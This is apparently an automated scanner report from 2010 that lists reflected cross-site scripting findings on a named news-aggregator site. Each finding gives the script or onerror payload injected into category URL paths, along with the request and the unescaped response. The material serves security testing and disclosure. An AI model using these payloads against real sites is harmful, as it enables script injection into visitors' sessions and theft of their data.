This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/businessf3c55"><script>alert(1)</script>b15c989737 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:58 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=bc04a403dd7cc1869f6a03c197ea8802; expires=Wed, 12-Dec-2035 00:32:58 GMT; path=/ Content-Length: 15295 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/businessf3c55"><script>alert(1)</script>b15c989737%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d24c5<img%20src%3da%20onerror%3dalert(1)>46cf9f731fc was submitted in the REST URL parameter 2. This input was echoed as d24c5<img src=a onerror=alert(1)>46cf9f731fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/celebritiesd24c5<img%20src%3da%20onerror%3dalert(1)>46cf9f731fc HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:42 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=9cb6dc666187a6dcdc14b080edb3394e; expires=Wed, 12-Dec-2035 00:34:42 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76361
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc7d"><script>alert(1)</script>2a014fa01f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/celebrities1bc7d"><script>alert(1)</script>2a014fa01f3 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:17 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=d6c11e6b0459dd45682d416c17faf7f1; expires=Wed, 12-Dec-2035 00:34:18 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15342
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/celebrities1bc7d"><script>alert(1)</script>2a014fa01f3%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6ea8c<img%20src%3da%20onerror%3dalert(1)>a6c822288d7 was submitted in the REST URL parameter 2. This input was echoed as 6ea8c<img src=a onerror=alert(1)>a6c822288d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/economy6ea8c<img%20src%3da%20onerror%3dalert(1)>a6c822288d7 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:00 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=0fd36060f92bb250fc5d0a247e3033f3; expires=Wed, 12-Dec-2035 00:33:01 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76265
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cffb5"><script>alert(1)</script>a3f30ef45 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/economycffb5"><script>alert(1)</script>a3f30ef45 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:34 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=3ad05db27beae48d13f2d045af0d82cd; expires=Wed, 12-Dec-2035 00:32:35 GMT; path=/ Content-Length: 15274 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/economycffb5"><script>alert(1)</script>a3f30ef45%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ee4"><script>alert(1)</script>e00f6129a7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/entertainmenta3ee4"><script>alert(1)</script>e00f6129a7e HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:56 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=dd09fd26ecbda905a17168a4bd935807; expires=Wed, 12-Dec-2035 00:33:57 GMT; path=/ Content-Length: 15368 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/entertainmenta3ee4"><script>alert(1)</script>e00f6129a7e%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc22b<img%20src%3da%20onerror%3dalert(1)>1fe2183b6eb was submitted in the REST URL parameter 2. This input was echoed as cc22b<img src=a onerror=alert(1)>1fe2183b6eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/entertainmentcc22b<img%20src%3da%20onerror%3dalert(1)>1fe2183b6eb HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:21 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=dfa413b08a321d5a2f632d71b2e3de34; expires=Wed, 12-Dec-2035 00:34:21 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76409
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5b25"><script>alert(1)</script>fea7bd3e61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/financea5b25"><script>alert(1)</script>fea7bd3e61 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:44 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=bb1564f301da1ddb0463dfb6183ae806; expires=Wed, 12-Dec-2035 00:32:44 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/financea5b25"><script>alert(1)</script>fea7bd3e61%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5149<img%20src%3da%20onerror%3dalert(1)>f79d879f42e was submitted in the REST URL parameter 2. This input was echoed as a5149<img src=a onerror=alert(1)>f79d879f42e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/financea5149<img%20src%3da%20onerror%3dalert(1)>f79d879f42e HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:07 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=93e5f8f90530592ebf9935829b307734; expires=Wed, 12-Dec-2035 00:33:08 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76265
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f9aa<img%20src%3da%20onerror%3dalert(1)>c4ac0b9ef03 was submitted in the REST URL parameter 2. This input was echoed as 5f9aa<img src=a onerror=alert(1)>c4ac0b9ef03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/gadgets5f9aa<img%20src%3da%20onerror%3dalert(1)>c4ac0b9ef03 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:40 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=95c476058ce51140ec553fdf9f89433f; expires=Wed, 12-Dec-2035 00:33:40 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76265
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdac"><script>alert(1)</script>fc7269cdcd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/gadgets2cdac"><script>alert(1)</script>fc7269cdcd4 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:14 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=483b5ab3b54a7cfbd98bbe90724bb63f; expires=Wed, 12-Dec-2035 00:33:14 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15290
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/gadgets2cdac"><script>alert(1)</script>fc7269cdcd4%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1307"><script>alert(1)</script>13259a360a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/healthe1307"><script>alert(1)</script>13259a360a5 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:32:56 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=433c2a827789452acda873c37c76b305; expires=Wed, 12-Dec-2035 00:32:57 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/healthe1307"><script>alert(1)</script>13259a360a5%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28522<img%20src%3da%20onerror%3dalert(1)>d6fa561114 was submitted in the REST URL parameter 2. This input was echoed as 28522<img src=a onerror=alert(1)>d6fa561114 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/health28522<img%20src%3da%20onerror%3dalert(1)>d6fa561114 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:23 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=98ccb9772760bda629bec476a089dba7; expires=Wed, 12-Dec-2035 00:33:23 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76217
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e02d8<img%20src%3da%20onerror%3dalert(1)>5c58925a650 was submitted in the REST URL parameter 2. This input was echoed as e02d8<img src=a onerror=alert(1)>5c58925a650 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/moviese02d8<img%20src%3da%20onerror%3dalert(1)>5c58925a650 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:18 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=70aaedb4f6c512e28462839194d10d88; expires=Wed, 12-Dec-2035 00:34:18 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76241
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2854a"><script>alert(1)</script>0e5b3134057 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/movies2854a"><script>alert(1)</script>0e5b3134057 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:54 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=05fdb0272a163808f14fb77f4ca5f123; expires=Wed, 12-Dec-2035 00:33:55 GMT; path=/ Content-Length: 15277 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/movies2854a"><script>alert(1)</script>0e5b3134057%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc4d8<img%20src%3da%20onerror%3dalert(1)>d2ae5387921 was submitted in the REST URL parameter 2. This input was echoed as cc4d8<img src=a onerror=alert(1)>d2ae5387921 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/musiccc4d8<img%20src%3da%20onerror%3dalert(1)>d2ae5387921 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:34:06 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=69b16b19f99a662a4816593ae7215272; expires=Wed, 12-Dec-2035 00:34:06 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76217
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ae98"><script>alert(1)</script>626aaca745e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/music1ae98"><script>alert(1)</script>626aaca745e HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:39 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=5c7d3c4b77f740d7bcab887da1ba0188; expires=Wed, 12-Dec-2035 00:33:39 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/music1ae98"><script>alert(1)</script>626aaca745e%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4961a"><script>alert(1)</script>d19c97b7212 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/nba-basketball4961a"><script>alert(1)</script>d19c97b7212 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:26 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=26c99d3374b5193022c2d00160f78310; expires=Wed, 12-Dec-2035 00:33:27 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/nba-basketball4961a"><script>alert(1)</script>d19c97b7212%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e5db6<img%20src%3da%20onerror%3dalert(1)>42b3cd9e16e was submitted in the REST URL parameter 2. This input was echoed as e5db6<img src=a onerror=alert(1)>42b3cd9e16e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/nba-basketballe5db6<img%20src%3da%20onerror%3dalert(1)>42b3cd9e16e HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:55 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=305d5c037235e3d7b26acc89f6406f19; expires=Wed, 12-Dec-2035 00:33:56 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76433
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 class="headline">Top Nba Basketballe5db6<img Src=a Onerror=alert(1)>42b3cd9e16e Blogs </h1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e1238<img%20src%3da%20onerror%3dalert(1)>f62307ac77f was submitted in the REST URL parameter 2. This input was echoed as e1238<img src=a onerror=alert(1)>f62307ac77f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/nfl-footballe1238<img%20src%3da%20onerror%3dalert(1)>f62307ac77f HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:33:43 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=7ac98e03d6dea3a8119351f951938471; expires=Wed, 12-Dec-2035 00:33:44 GMT; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 76385
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77ada"><script>alert(1)</script>23cd133b9c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/nfl-football77ada"><script>alert(1)</script>23cd133b9c6 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
